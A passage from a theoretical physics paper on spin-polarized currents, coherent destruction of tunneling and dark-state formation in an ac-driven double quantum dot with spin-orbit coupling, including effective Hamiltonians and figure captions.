magnetic field, there can also be resonances when the states with opposite spin have the same energy, which is enabled by the presence of a spin-flip component in the tunneling amplitudes. This will occur whenever \(\delta=\pm E_{z}\), as represented in figure 2 (process 2). Moreover, in the presence of an ac bias, these resonances are accompanied by a set of replicas due to PAT. This is process 3 in figure 2. As a result, when the current is represented as a function of \(\delta\) and \(E_{z}\) as in figure 2(a), we find both the usual resonances at \(\delta=n\omega\) and a set of spin-flip resonances along the lines \[\delta+n\omega=\pm E_{z}. \tag{9}\] In the \(\delta-E_{z}\) representation of figure 2(a), these correspond _mostly_ to diagonal lines. Note that transport at these resonances is not blocked when a particle tunnels from the source into the left dot with a direction that is not energy-aligned with any state on the right dot (such as \(|L\downarrow\rangle\) in process 2 of figure 2). Due to the finite spin-flip tunneling Figure 2: (a) Current through a DQD as a function of \(\delta\) and \(E_{z}\) for \(\chi=0.1\) and \(\beta_{\mathrm{SO}}=E_{z}/2\). Highlighted in the figure, there is a set of four characteristic processes numbered \(1-4\). Process 1 corresponds to direct spin-conserving PAT through the two spin channels at \(\delta=0\). Process 2 corresponds to direct spin-flip PAT. Process 3 corresponds to spin-flip PAT involving one photon. Process 4 corresponds to spin-conserving PAT involving one photon through the two spin channels at \(\delta=\omega\). All four processes are schematically represented on the left side of the figure. (b) A set of cuts in panel (a) at different values of \(E_{z}\), with a small offset of the \(y\)-axis for clarity. (c) Spin polarization of the current as a function of \(\delta\) and \(E_{z}\). (d) Spin polarization (solid black, left axis) and total current (dashed red, right axis) for \(E_{z}=0.25\omega\) as a function of \(\delta\), represented by the horizontal cut in panel (c). In regions around \(\delta=\pm 0.5\omega\), the current can be switched directly from one polarization to the opposite one with comparable intensity. Other parameters are \(\omega=10\tau=100\Gamma\), and \(\epsilon_{\mathrm{ac}}=1.2\omega\). amplitude, the spin states always have a small component of the opposite spin. Another way to see this is that the spin rotates as a result of virtual tunneling to the dot via the aforementioned TME until it aligns with the resonance. However, there are several points where this simple picture breaks down. In the vicinity of a PAT process with \(n\) photons the states in the two dots are strongly hybridized with energies \[E_{\pm}=\delta\pm\tau J_{n}\left(\frac{\epsilon_{\rm ac}}{\omega}\right), \tag{10}\] for the two molecular states, where \(J_{n}(z)\) is the \(n\)th-order Bessel function. There, the diagonal lines are no longer straight but curve at \(E_{z}\approx\pm\tau\), corresponding to the resonance conditions with the energies given by equation (10). This is clearly seen in figure 2(a) in the PAT resonances near \(E_{z}=0\). The overall shape of these resonances closely follows hyperbolas in the \(\delta-E_{z}\) representation shown there. Another departure from this simple picture occurs near \(E_{z}=\pm\omega\), where the OME field induces resonant transitions between the two spin states. There, the spin-flip resonances do not cross the spin-conserving PAT resonances at \(\delta=\pm\omega\). Instead, the spin-flip resonant lines are _repelled_ so that a current-free gap opens between the main resonances (1) and the spin-flip resonances (2). Moreover, we see another effect on the current at the main resonances at \(\delta=0\). There, the spin-flip resonances cross the main resonances at \(E_{z}=\pm(\tau+\beta_{\rm SO})\) instead of simply crossing at \(E_{z}=\pm\tau\), as discussed above. The spin-flip resonances are then still hyperbolas but vertically displaced from where they would be for \(\beta_{\rm SO}=0\). Finally, when photo-assisted spin-flip resonances with zero or one photon meet, they do not get distorted (such as at \(\delta=\pm\omega/2\), \(E_{z}=\pm\omega/2\) in figure 2(a)) as they correspond to processes that transmit different spin polarizations. The spin polarization of the current is defined as \[P_{\sigma}=\frac{I_{\uparrow}^{\infty}-I_{\downarrow}^{\infty}}{I_{\uparrow}^{ \infty}+I_{\downarrow}^{\infty}}, \tag{11}\] where \(I_{\sigma}^{\infty}=e\Gamma\rho_{{\rm R},\sigma}^{\infty}\). We have represented \(P_{\sigma}\) as a function of \(\delta\) and \(E_{z}\) in figure 2(c). As expected, the spin polarization is non-zero at the spin-flip current branches, provided that only one path is active (either \(|L\uparrow\rangle\rightarrow|R\downarrow\rangle\) or \(|L\downarrow\rangle\rightarrow|R\uparrow\rangle\)). We are able to obtain spin polarization close to 1, with the largest limitation in this setup being the overlap of a spin-flip resonance with a spin-conserving PAT resonance. The width of spin-conserving resonances can be tuned by reducing \(\tau_{0}\), and the separation between PATs can be increased by varying the ac voltage frequency \(\omega\). This setup allows for several ways of controlling spin polarization. In figure 2(d), we show the polarization together with the total current. By varying \(\delta\) from \(\delta\simeq 0.2\omega\) to \(\delta\simeq 0.8\omega\), we are able to shift from a direct PAT resonance with a strong spin polarization in one direction to a one-photon PAT resonance with a strong spin polarization in the opposite one. Hence, polarization can be inverted without crossing the resonance at \(\delta=0\). Since \(\delta\) is often one of the easiest parameters to control in experimental setups, this allows us to generate highly tunable fully spin-polarized currents. This is remarkable, since the spin-flip amplitude in this case has been considered very small (\(\chi=0.1\)). With a correct tuning of \(\chi\) and \(\tau\) (reducing the width of the spin-conserving resonances), the spin polarization can be adjusted to an even larger degree. We note a slight asymmetry in the spin polarization in the two adjacent highly polarized peaks at \(\delta\simeq 0.2\omega\) and \(\delta\simeq 0.8\omega\) resulting from the OME term. This can be seen in figure 2(c), where the resonance lines have different widths depending on whether they cross the \(E_{z}=\pm\omega\), \(\delta=\pm\omega\) points or not. For \(\beta_{\mathrm{SO}}\to 0\), the current associated with the two resonances has the same absolute value of polarization (and is close to \(P_{\sigma}=\pm 1\), respectively). Tunneling the frequency of the ac voltage, the setup allows another mode of generating spin-polarized currents. The DQD can be initialized in a configuration in which direct resonances without photons are energetically disfavored. Then, applying a voltage with the frequency tuned to either the spin-conserving or the spin-flip resonance with absorption or emission or photons, the resulting current will be spin-polarized in one direction or the other, depending on the spin of the initial state. Both modes of operation allow for fully electric control of the spin polarization of the current without the need to modify the magnetic fields, which enables fast control of the current under experimental conditions. Next, we study the effect of varying the amplitude of the ac voltage. Due to Landau-Zener-Stuckelberg (LZS) interferences, if the QDs are in resonance \(\delta=n\omega\), photo-assisted transitions can be understood to occur with a tunneling amplitude renormalized by a Bessel function as [58, 59, 75] \[\tau_{\zeta}\rightarrow\tau_{\zeta}J_{n}\left(\frac{\epsilon_{\mathrm{ac}}}{ \omega}\right),\quad\zeta\in\{0,\mathrm{sf}\}. \tag{12}\] Crucially, both the spin-conserving and spin-flip amplitudes are equally modified by the presence of the ac field 1. This well-known expression holds except at the points where the spin levels are in resonance as well (\(E_{z}=m\omega\)), as we will see in the next sections. At the zeros of any given Bessel function, destructive interference occurs, and both spin-conserving and spin-flip tunneling rates are suppressed. This effect is known as coherent destruction of tunneling (CDT) [49]. The resulting pattern is given in figure 3(a), where we have represented the current as a function of both \(\delta\) and \(\epsilon_{\mathrm{ac}}\), for a range that includes the first five photo-assisted resonances in each direction of \(\delta\), plus the resonance at \(\delta=0\). Spin-flip resonances are visible as thinner parallel lines along the \(\epsilon_{\mathrm{ac}}\) axis, two to each side of the main resonances. We have also represented in figure 3(a) (bottom panel) a set of cuts at \(\epsilon_{\mathrm{ac}}=0\) (green), \(\epsilon_{\mathrm{ac}}=3\omega\) (blue) and \(\epsilon_{\mathrm{ac}}=6\omega\) (red), showing the resonance pattern (similarly to figure 2). Furthermore, figure 3(a) (left panel) shows the interference pattern that leads to CDT. Here, we have represented a set of cuts at values of \(\delta=n\omega\) for \(n=0\) (pink), \(n=1\) (line) and \(n=2\) (cyan). We also include dashed lines to denote the first zeros of \(J_{n}(\epsilon_{\mathrm{ac}}/\omega)\), which coincide precisely with the dips in the current at \(\delta=n\omega\). Finally, in figure 3(b) we plot the spin polarization for the LZS interferometry. The main spin-conserving resonances have an unpolarized spin current \(P_{\sigma}\sim 0\), since both the spin-up and spin-down channels are present with the same probability. However, spin-flip resonances at \(\delta=n\omega\pm E_{z}\) are highly spin polarized \(P_{\sigma}\sim\pm 1\), as already mentioned above. These resonances, similar to the spin-conserving ones, also exhibit a CDT effect where \(J_{n}(\epsilon_{\rm ac}/\omega)=0\). ### Effect of the OME In this section, we consider in detail the effect of the OME term. This will be, in general, a weak effect because the amplitude of the SOC-induced OME field is smaller than the electric voltage amplitude. However, as anticipated above, the OME has a strong effect near the spin resonances at \(E_{z}\simeq n\omega\). At these points, the effective ac magnetic field can induce resonant transitions between the two spin states on the same QD. To focus on this regime, let us consider the Hamiltonian at any such resonance. We perform the following unitary transformation \[\hat{U}(t)=\exp\left(\frac{-in\omega t\hat{\sigma}_{z}}{2}\right)\exp\left( \frac{-i\epsilon_{\rm ac}\sin(\omega t)(1+\hat{\tau}_{z})}{2\omega}\right), \tag{13}\] where \(\hat{\tau}_{i}\) are Pauli matrices associated to the charge (left/right dot) degree of freedom. The leftmost operator transforms the system into the rotating frame at the spin resonance. The rightmost operator transforms into the interacting picture with respect Figure 3: (a) Current and (b) spin polarization through a DQD as a function of \(\delta\) and \(\epsilon_{\rm ac}\). (a, bottom) Cuts along the horizontal axis at \(\epsilon_{\rm ac}=0\) (green), \(\epsilon_{\rm ac}=3\omega\) (blue), and \(\epsilon_{\rm ac}=6\omega\) (red), showing the appearance of satellite peaks close to the main resonances for \(\epsilon_{\rm ac}\neq 0\). (a, left) Cut the along the vertical axis (dashed lines) at \(\delta=n\omega\) with \(n=0\) (pink), \(n=1\) (lime), and \(n=2\) (cyan), showing the appearance of coherent destruction of tunneling, where the current drops to zero. The horizontal solid lines denote the zeros of the Bessel function \(J_{n}(\epsilon_{\rm ac}/\omega)\). The parameters used are \(\omega=10\tau=100\Gamma\), \(E_{z}=0.3\omega\), \(\beta_{\rm SO}=0\), and \(\chi=0.2\). to the ac voltage, removing the corresponding term from the Hamiltonian at the cost of turning the tunneling time-dependent. Its purpose is to allow for arbitrary ac voltage amplitudes within a rotating-wave approximation (RWA) [60], under which we will work. When the transformation of equation (13) is performed and the Jacobi-Anger expansion is employed, the terms in the Hamiltonian are changed as \[\langle\eta\sigma|\hat{H}_{0}|\eta\sigma\rangle=E_{z}\to E_{z}-n\omega, \tag{14a}\] \[\langle\mathrm{R}\sigma|\hat{H}_{0}|\mathrm{L}\sigma\rangle= \tau_{0}\to\tau_{0}\sum_{k=-\infty}^{\infty}J_{k}\left(\frac{\epsilon_{\mathrm{ ac}}}{\omega}\right)e^{ik\omega t},\] (14b) \[\langle\mathrm{R}\uparrow(\downarrow)|\hat{H}_{0}|\mathrm{L} \downarrow(\uparrow)\rangle=\pm\tau_{\mathrm{sf}}\to\pm\tau_{\mathrm{sf}}\sum_ {k=-\infty}^{\infty}J_{k}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)e^ {i(k\mp n)\omega t},\] (14c) \[\langle\eta\uparrow|\hat{H}_{1}|\eta\downarrow\rangle=\beta\left(t \right)\to\frac{\beta_{\mathrm{SO}}}{2}\left(e^{i(n+1)\omega t}+e^{i(n-1) \omega t}\right). \tag{14d}\] Other terms are obtained by imposing hermiticity on the effective Hamiltonian. Let us now consider the avoided crossing at \(\delta\approx 0\), \(n=1\), visible in figure 2 (the resonance \(n=-1\) follows a similar behavior). We apply now the RWA, neglecting the time-dependent terms. This yields \[\hat{H}_{\mathrm{RWA}}=\left(\begin{array}{cccc}-\delta/2&\beta_{\mathrm{ SO}}/4&-\tau_{0}^{\mathrm{RWA}}&-\tau_{\mathrm{sf}}^{\mathrm{RWA}}\\ \beta_{\mathrm{SO}}/4&-\delta/2&-\tau_{\mathrm{sf}}^{\mathrm{RWA}}&-\tau_{0}^ {\mathrm{RWA}}\\ -\tau_{0}^{\mathrm{RWA}}&-\tau_{\mathrm{sf}}^{\mathrm{RWA}}&\delta/2&\beta_{ \mathrm{SO}}/4\\ -\tau_{\mathrm{sf}}^{\mathrm{RWA}}&-\tau_{0}^{\mathrm{RWA}}&\beta_{\mathrm{SO }}/4&\delta/2\end{array}\right), \tag{15}\] where \(\tau_{0}^{\mathrm{RWA}}=\tau_{0}J_{0}(\epsilon_{\mathrm{ac}}/\omega)\) and \(\tau_{\mathrm{sf}}^{\mathrm{RWA}}=\tau_{\mathrm{sf}}J_{1}(\epsilon_{\mathrm{ ac}}/\omega)\). Note that at the resonance between the two spin levels, the spin-conserving tunneling amplitude is renormalized by \(J_{0}(z)\) while the spin-flip amplitude is renormalized by \(J_{1}(z)\), with \(z=\epsilon_{\mathrm{ac}}/\omega\). In this frame, the OME term acts as a constant magnetic field, resulting in a splitting \(\beta_{\mathrm{SO}}/2\) of the spins in the x-direction. The avoided crossing between the spin-conserving and spin-flip resonances discussed above can be understood in this picture as the OME term producing a splitting between the spins that is only strong near the EDSR. Therefore, resonant transport occurs now when \(\delta=\pm\beta_{\mathrm{SO}}/2\). These new resonances are visible in figure 4(a) as side peaks next to the main resonance at \(\delta=0\). Note that the position of the resonances shows a linear relationship between detuning and \(\beta_{\mathrm{SO}}\), as expected. However, around \(\beta_{\mathrm{SO}}\lesssim\tau\) the hybridization between states is large enough to distort this simple picture (in the same way as for equation (10)). The previous results are valid provided that \(\beta_{\mathrm{SO}}/\omega\ll 1\), as required by the RWA. We can further relax this condition by performing the transformation \[\hat{U}^{\prime}(t)=\exp\left(\frac{-i\beta_{\mathrm{SO}}\sin\left(\omega t \right)\hat{\sigma}_{x}}{2\omega}\right) \tag{16}\] to the original Hamiltonian in equation (2), and then apply \(\hat{U}(t)\) given in equation (13). This transformation removes \(\hat{H}_{1}(t)\) (the OME term) at the cost of transforming the spin-flip and Zeeman splitting terms as \[\frac{E_{z}}{2}\hat{\sigma}_{z}\rightarrow \frac{E_{z}}{2}\cos\left[\frac{\beta_{\mathrm{SO}}}{\omega}\sin \left(\omega t\right)\right]\hat{\sigma}_{z} \tag{17a}\] \[+\frac{E_{z}}{2}\sin\left[\frac{\beta_{\mathrm{SO}}}{\omega}\sin \left(\omega t\right)\right]\hat{\sigma}_{y},\] \[\tau_{\mathrm{sf}}\hat{\tau}_{y}\hat{\sigma}_{y}\rightarrow \tau_{\mathrm{sf}}\hat{\tau}_{y}\cos\left[\frac{\beta_{\mathrm{SO }}}{\omega}\sin\left(\omega t\right)\right]\hat{\sigma}_{y}\] \[-\tau_{\mathrm{sf}}\hat{\tau}_{y}\sin\left[\frac{\beta_{\mathrm{ SO}}}{\omega}\sin\left(\omega t\right)\right]\hat{\sigma}_{z}. \tag{17b}\] The first term on the right-hand side of the expression for \(E_{z}\) reflects the renormalization effect due to the ac magnetic field. Compared to equation (15), this term renormalizes the Zeeman splitting by a factor \(J_{0}(\beta_{\mathrm{SO}}/\omega)\). At destructive interferences where \(J_{0}\left(\beta_{\mathrm{SO}}/\omega\right)=0\), the Zeeman splitting is completely suppressed in a process known as spin locking (SL) [51]. Nonetheless, this suppression occurs for values of \(\beta_{\mathrm{SO}}\) beyond those discussed in A. In general, the main effect of this renormalization is that EDSR now occurs at \(E_{z}J_{0}(\beta_{\mathrm{SO}}/\omega)=n\omega\). The second term on the expression for \(E_{z}\) reduces for \(\beta_{\mathrm{SO}}/\omega\ll 1\) to the (phase-shifted) OME term. At resonance \(n=\pm 1\), this corresponds to the substitution \[\frac{\beta_{\mathrm{SO}}}{2}\to E_{z}J_{1}\left(\frac{\beta_{\mathrm{ SO}}}{\omega}\right), \tag{18}\] Figure 4: (a) Current through a DQD as a function of \(\delta\) and \(\beta_{\mathrm{SO}}\). A cut along the horizontal axis at \(\beta_{\mathrm{SO}}=0.4\omega\) is shown in panel (b). The black solid line is obtained with the original Hamiltonian (equation (2)), while the red dashed line is obtained by the effective Hamiltonian (equation (24)). Two satellite peaks are located at \(\delta\simeq\pm\beta_{\mathrm{SO}}/2\), marked with the blue square and red diamond symbols. The energy levels in these situations, for the effective Hamiltonian, are shown schematically on the right side of the figure. Here, the width of the arrows denotes the tunneling amplitudes for each possible path, while the gray arrows represent tunneling paths that are less favorable. In all panels, \(E_{z}=\omega\), \(\epsilon_{\mathrm{ac}}=1.2\omega\), \(\omega=10\tau=100\Gamma\), and \(\chi=0.2\). e.g., in equation (15). In the limit \(\beta_{\mathrm{SO}}/\omega\ll 1\) we recover the result of the previous section, while for \(J_{1}\left(\beta_{\mathrm{SO}}/\omega\right)=0\) the effective magnetic field is suppressed in a similar way to the case discussed above where spin locking takes place. Again, this effect occurs for parameters beyond the scope of the approximations of A and we do not consider it any further. Regarding the transformed spin-flip term, given in equation (17b), it may seem that the first term would also produce a similar Bessel function renormalization. However, the spin-flip amplitude at an arbitrary \(\beta_{\mathrm{SO}}\) allows sidebands to be generated from both the ac voltage and the OME term. The combination of these sidebands yields a more complicated expression. After applying the transformation of equation (13) and expanding the first term of equation (17b) using the Jacobi-Anger expansion, we find the following: \[\pm\tau_{\mathrm{sf}}\rightarrow\frac{\pm\tau_{\mathrm{sf}}}{2}\sum_{k=- \infty}^{\infty}\sum_{k^{\prime}=-\infty}^{\infty}J_{k}\left(\frac{\epsilon_ {\mathrm{ac}}}{\omega}\right)J_{2k^{\prime}}\left(\frac{\beta_{\mathrm{SO}}}{ \omega}\right)\left(e^{i(-k\mp n+2k^{\prime})\omega t}+e^{i(-k\mp n-2k^{ \prime})\omega t}\right), \tag{19}\] where \(\pm\) corresponds to the sign of the two spin channels, as in equation (2). In the RWA, we find \[\pm\tau_{\mathrm{sf}}\rightarrow\,(\mp 1)^{n+1}\tau_{ \mathrm{sf}}^{\mathrm{RWA}}, \tag{20}\] \[\tau_{\mathrm{sf}}^{\mathrm{RWA}}=\tau_{\mathrm{sf}}\sum_{k=- \infty}^{\infty}J_{2k+n}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)J_{ 2k}\left(\frac{\beta_{\mathrm{SO}}}{\omega}\right). \tag{21}\] Finally, consider the last term on equation (17b). After applying the transformation of equation (13), we find a term \(\propto|L\rangle\langle R|\hat{\sigma}_{z}\) with amplitude \[\tau_{\mathrm{sf}}\sum_{k=-\infty}^{\infty}\sum_{k^{\prime}=0}^{\infty}J_{k} \left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)J_{2k^{\prime}+1}\left( \frac{\beta_{\mathrm{SO}}}{\omega}\right)\left(e^{i(k+2k^{\prime}+1)\omega t} -e^{i(k-2k^{\prime}-1)\omega t}\right). \tag{22}\] In the RWA, only the terms with \(k=\pm(2k^{\prime}+1)\) contribute and we obtain the real tunneling rate \[\tau_{\mathrm{si}}^{\mathrm{RWA}}=\tau_{\mathrm{sf}}\sum_{k=-\infty}^{\infty }J_{2k+1}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)J_{2k+1}\left( \frac{\beta_{\mathrm{SO}}}{\omega}\right). \tag{23}\] This produces spin-conserving amplitudes of different absolute values depending on the direction of the spin, i.e., the spin-conserving tunneling of a spin-down particle occurs with a tunneling amplitude different from that of a spin-up particle. Note that this term arises only because of the combination of sidebands from both the ac voltage and the OME term, resulting in a finite static component that contributes to the Hamiltonian even in the RWA. Remarkably, both electric and magnetic sidebands arise from the same applied voltage. In that sense, this is a constructive self-interference effect, in a similar way to virtual tunneling processes that involve two PAT transitions [55, 57]. Let us now compare the results for arbitrary \(\beta_{\mathrm{SO}}\) with the Hamiltonian in the \(\beta_{\mathrm{SO}}\ll\omega\) limit, equation (15). Again, let us focus on \(n=1,\ \delta\approx 0\). We diagonalize the spin subspace by performing a rotation around the y-axis by an angle \(\theta\equiv\arctan(E_{z}^{\rm RWA}/\beta_{\rm SO}^{\rm RWA})\), where \(E_{z}^{\rm RWA}\equiv E_{z}J_{0}\left(\beta_{\rm SO}/\omega\right)-\omega\) and \(\beta_{\rm SO}^{\rm RWA}\equiv E_{z}J_{1}(\beta_{\rm SO}/\omega)\). Finally, the effective Hamiltonian in its matrix form reads \[\hat{\widetilde{H}}=\left(\begin{array}{cccc}(\widetilde{E}_{z}-\delta)/2&0&- \widetilde{\tau}_{\uparrow}&-\widetilde{\tau}_{\rm sf}\\ 0&(-\widetilde{E}_{z}-\delta)/2&-\widetilde{\tau}_{\rm sf}&-\widetilde{\tau}_ {\downarrow}\\ -\widetilde{\tau}_{\uparrow}&-\widetilde{\tau}_{\rm sf}&(\widetilde{E}_{z}+ \delta)/2&0\\ -\widetilde{\tau}_{\rm sf}&-\widetilde{\tau}_{\downarrow}&0&(-\widetilde{E}_ {z}+\delta)/2\end{array}\right), \tag{24}\] where we have defined the effective magnitudes as \[\widetilde{E}_{z} \equiv \sqrt{(E_{z}^{\rm RWA})^{2}+(\beta_{\rm SO}^{\rm RWA})^{2}}, \tag{25}\] \[\widetilde{\tau}_{\uparrow,\downarrow} \equiv \tau_{0}^{\rm RWA}\mp\left[\sin(\theta)\tau_{\rm sf}^{\rm RWA}- \cos(\theta)\tau_{\rm si}^{\rm RWA}\right],\] (26) \[\widetilde{\tau}_{\rm sf} \equiv \cos(\theta)\tau_{\rm sf}^{\rm RWA}+\sin(\theta)\tau_{\rm si}^{ \rm RWA}. \tag{27}\] The effective model represents a DQD system in the presence of a homogeneous Zeeman splitting \(\widetilde{E}_{z}\), a spin-conserving tunneling rate which is different in general for the spin-up and spin-down channels \(\widetilde{\tau}_{\uparrow,\downarrow}\), and a spin-flip tunneling rate \(\widetilde{\tau}_{\rm sf}\). The magnetic field can be simplified for \(\beta_{\rm SO}<\omega\) as \(\widetilde{E}_{z}=\beta_{\rm SO}/2+\mathcal{O}\left((\beta_{\rm SO}/\omega)^{ 5}\right)\), recovering the linear relation between \(\delta\) and \(\beta_{\rm SO}\) for the resonant condition explained above. Note that the effective model is strictly only valid for small detuning \(\delta\ll\omega\). The different spin-conserving tunneling rates \(\widetilde{\tau}_{\uparrow,\downarrow}\) contribute in a characteristic fashion to the current. In figure 4(a), we observe a significant asymmetry between the two secondary resonances depending on the sign of \(\delta\). As we shall see next, this asymmetry arises fundamentally due to the fact that \(|\widetilde{\tau}_{\uparrow}|\neq|\widetilde{\tau}_{\downarrow}|\). The two satellite peaks shown in figure 4(b) occur when the energies of two levels with opposite spin are in resonance 2. This is the situation schematized in figure 4. If \(\delta<0\), the spin-down state of the left dot is in resonance with the spin-up state of the right dot and the most likely tunneling path is given by \(\widetilde{\tau}_{\rm sf}\), while \(\widetilde{\tau}_{\downarrow}\) can be neglected at first order. Meanwhile, the spin-up energy level on the left dot is out of resonance with an energy difference given by \(\widetilde{E}_{z}\). However, due to \(\widetilde{\tau}_{\uparrow}\), there is still a small but finite probability of tunneling to the right dot [76]. In the case of \(\delta>0\), we have a similar situation, except that the non-resonant level (spin-down in this case) tunnels with an amplitude given by \(\widetilde{\tau}_{\downarrow}\). Using equations (21, 23) with \(k=-2,-1,\ldots,2\), and the parameters used in figure 4(b), we obtain \(\widetilde{\tau}_{\uparrow}\simeq 0.06\omega\) and \(\widetilde{\tau}_{\downarrow}\simeq 0.04\omega\), and \(\widetilde{\tau}_{\rm sf}\simeq 0.002\omega\). Since \(\widetilde{\tau}_{\uparrow}>\widetilde{\tau}_{\downarrow}\) the effective model predicts a higher current for resonance at \(\delta<0\), which is in agreement with the numerical results obtained from the original Hamiltonian. In figure 4(b), we compare the current obtained both with the total Hamiltonian (equation (2)) and with the effective Hamiltonian (equation (24)), showing how the effective Hamiltonian predicts the presence of satellite peaks close to the main resonance and the asymmetry in \(\delta\). The fact that the asymmetry in \(\delta\) is a consequence of \(|\widetilde{\tau}_{\uparrow}|\neq|\widetilde{\tau}_{\downarrow}|\) can be further seen by calculating the effective magnetic field due to the TME, which is explicitly asymmetric in \(\delta\). This is shown in more detail in C. ## 4 Dark state formation Dark states are a well-known feature in open quantum systems, first described in the context of the optical response of electrons to laser pumping. In mesoscopic transport, a dark state refers to a steady state in which coherent interference results in a current blockade even in a situation where it would be expected to flow [77, 78, 79, 80]. In this particular setup, dark states correspond to a particle confined to the left dot, as the right dot will be immediately emptied by tunneling to the drain. In the following, we focus on the main resonances \(\delta=m\omega\), \(m\in\mathbb{Z}\), where a non-zero current is expected to flow. In this case, as mentioned above, current blockade occurs due to the LZS interference pattern at the points where \(J_{m}\left(\epsilon_{\mathrm{ac}}/\omega\right)=0\), yielding the aforementioned CDT. Taking into account the resonance \(\delta=0\), the current through the DQD can be suppressed if the driving amplitude verifies \(J_{0}(\epsilon_{\mathrm{ac}}/\omega)=0\), which occurs close to \(\epsilon_{\mathrm{ac}}\simeq 2.4\omega\). As described above, this renormalization is the same for both the spin-conserving and spin-flip tunneling amplitudes. However, if the system is simultaneously in a configuration in which the spin states are also in resonance with the ac voltage frequency \(E_{z}=n\omega\), the renormalization is not necessarily the same, as seen in the previous section. We focus on this case in the following. Let us consider the Hamiltonian in the rotating frame, as in equation (15), for an \(n-\)photon resonance. First, consider \(\beta_{\mathrm{SO}}=0\). We analyze below how the dark states are affected when including a non-zero OME term. In the case of a spin-up particle tunneling from the left to the right dot, emitting \(n\) photons, the spin-flip tunneling rate is renormalized as \(\tau_{\mathrm{sf}}\to\tau_{\mathrm{sf}}J_{-n}(\epsilon_{\mathrm{ac}}/\omega)\). On the other hand, if the particle tunnels from the left dot with spin down, it will absorb \(n\) photons, so that \(\tau_{\mathrm{sf}}\to\tau_{\mathrm{sf}}J_{n}(\epsilon_{\mathrm{ac}}/\omega)\). This situation is shown schematically in figure 5(a). The effective Hamiltonian under an RWA then reads \[\hat{H}^{(n)}_{\mathrm{RWA}}=\left(\begin{array}{cccc}0&0&-\tau_{0}J_{0}( \epsilon_{\mathrm{ac}}/\omega)&-\tau_{\mathrm{sf}}J_{n}(\epsilon_{\mathrm{ac} }/\omega)\\ 0&0&\tau_{\mathrm{sf}}J_{-n}(\epsilon_{\mathrm{ac}}/\omega)&-\tau_{0}J_{0}( \epsilon_{\mathrm{ac}}/\omega)\\ -\tau_{0}J_{0}(\epsilon_{\mathrm{ac}}/\omega)&\tau_{\mathrm{sf}}J_{-n}( \epsilon_{\mathrm{ac}}/\omega)&0&0\\ -\tau_{\mathrm{sf}}J_{n}(\epsilon_{\mathrm{ac}}/\omega)&-\tau_{0}J_{0}( \epsilon_{\mathrm{ac}}/\omega)&0&0\end{array}\right). \tag{28}\] Since \(J_{-n}(z)=(-1)^{n}J(z)\), if the number of photons is odd, then the spin-flip term has the same sign for both spin directions. As discussed in A, time-reversal symmetry imposes the requirement that the spin-flip term must be \(\propto\hat{\tau}_{y}\), in terms of the charge Pauli matrices introduced above. This form of tunneling prohibits destructive interference between the spin-conserving and spin-flip tunneling channels. However, if the number of photons is odd, the RWA Hamiltonian in equation (28) has a spin-flip term of the form \(\hat{\tau}_{x}\hat{\sigma}_{x}\), which does not exhibit this protection. Instead, the combination of \(E_{z}\neq 0\) (breaking time-reversal symmetry) and \(\epsilon_{\rm ac}\neq 0\) (resulting in PAT) allows the spin-conserving and spin-flip paths to interfere destructively. By exact diagonalization of the above Hamiltonian, we look for DS of the form \(|{\rm DS}\rangle=(|L\uparrow\rangle+e^{i\varphi}|L\downarrow\rangle)/\sqrt{2}\) for an arbitrary relative phase \(\varphi\), which we find occurs when the ratio \(\chi\) between the spin-conserving and spin-flip amplitudes satisfies \[\widetilde{\chi}^{(n)}=\frac{J_{0}(\epsilon_{\rm ac}/\omega)}{J_{0}(\epsilon_ {\rm ac}/\omega)\pm i^{n+1}J_{n}(\epsilon_{\rm ac}/\omega)}, \tag{29}\] where the superindex denotes the dependence of the dark state on the resonance with the driving \(E_{z}=n\omega\). Since we must impose \(\widetilde{\chi}^{(n)}\in\mathds{R}\) (see equation (3)), the dark state appears only when an odd number of photons are absorbed or emitted, i.e., \(n=2k+1\) for \(k\in\mathds{Z}\). In particular, \(E_{z}=0\) corresponds to taking \(n=0\), and equation (29) has no real solution showcasing the need to break the time-reversal symmetry to observe dark-state formation. The dependence on the number of photons involved in the process is known as the odd-even effect, and has already been observed in DQDs, both theoretically and experimentally [68, 81, 82, 62, 63]. This type of process is generally intrinsic to multilevel systems, in which multiple pathways destructively interfere with each other [83]. In figure 5(b-c) we show the current through a DQD in the cases of \(n=1\) and \(n=2\), respectively. In the former case, we plot the analytical prediction for the existence of a dark state, equation (29), which is in agreement with the numerical results. If the spin-conserving tunneling path is not available, i.e., \(\tau_{0}=0\), or equivalently \(\chi=1\), then the only possible tunneling channel requires spin-flip, which is highly suppressed because of the large energy gap between states with opposite spin produced by \(E_{z}\). This process also results in current blockade (unrelated to interference effects) and is visible in the upper left corner of this figure. For \(n=2\) we see that the only two situations where the current is suppressed coincide with \(\chi\simeq 1\), \(\epsilon_{\rm ac}=0\), and with \(\chi=0\), \(\epsilon_{\rm ac}\simeq 2.4\omega\), as expected from the even-odd effect. In an experimental situation, in which the driving amplitude can be precisely tuned, the appearance of a sharp decrease in current at a given \(\epsilon_{\rm ac}\) can be used to determine the value of \(\chi\) and hence the SOC strength. To minimize the uncertainty of the measurement, several odd resonances for \(E_{z}=(2k+1)\omega\) can be studied, providing a precise way to characterize the SOC present in a given device. Next, we fix the driving amplitude at \(\epsilon_{\rm ac}=2\omega\) and consider arbitrary values of \(E_{z}\). The corresponding results are presented in figure 6(a). The DS at the exact resonant condition \(E_{z}=\omega\) extends to non-resonant values of \(E_{z}\), forming a parabola in the \(E_{z}-\chi\) plane. Again, we perform an exact diagonalization of the RWA Hamiltonian given by equation (28) and look for dark states. Up to second order in \((E_{z}-\omega)\), these are found for the condition \[\widetilde{\chi}^{(1)} = \frac{J_{0}(\epsilon_{\rm ac}/\omega)^{2}-|J_{0}(\epsilon_{\rm ac }/\omega)J_{1}(\epsilon_{\rm ac}/\omega)|}{J_{0}(\epsilon_{\rm ac}/\omega)^{2 }-J_{1}(\epsilon_{\rm ac}/\omega)^{2}} \tag{30}\] \[-\frac{(E_{z}-\omega)^{2}}{\tau^{2}|J_{0}(\epsilon_{\rm ac}/ \omega)J_{1}(\epsilon_{\rm ac}/\omega)|}+\mathcal{O}\left((E_{z}-\omega)^{4} \right).\] The prediction is in accordance with the numerical results (see the inset of figure 6(a)). Far from the resonance, the RWA is no longer valid, so the above equation does not apply. Once again, even if the dot levels are in resonance at \(\delta=0\), a trivial DS at \(\chi=1\) appears. In that situation, \(E_{z}\) is no longer in resonance with the driving, so the particle cannot absorb or emit a photon, and will be blocked in the left QD, as 